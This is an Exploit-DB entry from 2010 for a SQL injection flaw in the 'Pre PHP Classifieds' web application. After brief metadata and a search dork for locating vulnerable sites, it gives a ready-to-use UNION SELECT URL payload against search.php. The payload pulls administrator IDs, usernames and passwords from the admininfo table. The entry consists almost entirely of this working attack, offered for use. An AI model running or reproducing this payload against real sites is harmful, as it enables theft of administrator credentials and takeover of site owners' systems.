Pre PHP Classifieds SQL Injection Vulnerability

EDB-ID: 13992 CVE: N/A OSVDB-ID: N/A
Verified: Author: Sangteamtham Published: 2010-06-22
Download Exploit: Source Raw Download Vulnerable App: N/A
> #######################################################################
> # Source: PHP Classifieds SQL injection Vulnerability
> # Download: http://preproject.com/products.asp
> # Dork : Power by PHP Classifieds
> # Author: Sangteamtham@gmail.com
> #
> #######################################################################

Exploit:
http://localhost/clas/search.php?category=999999 UNION SELECT
group_concat(adminid,0x3a,username,0x3a,password) from admininfo--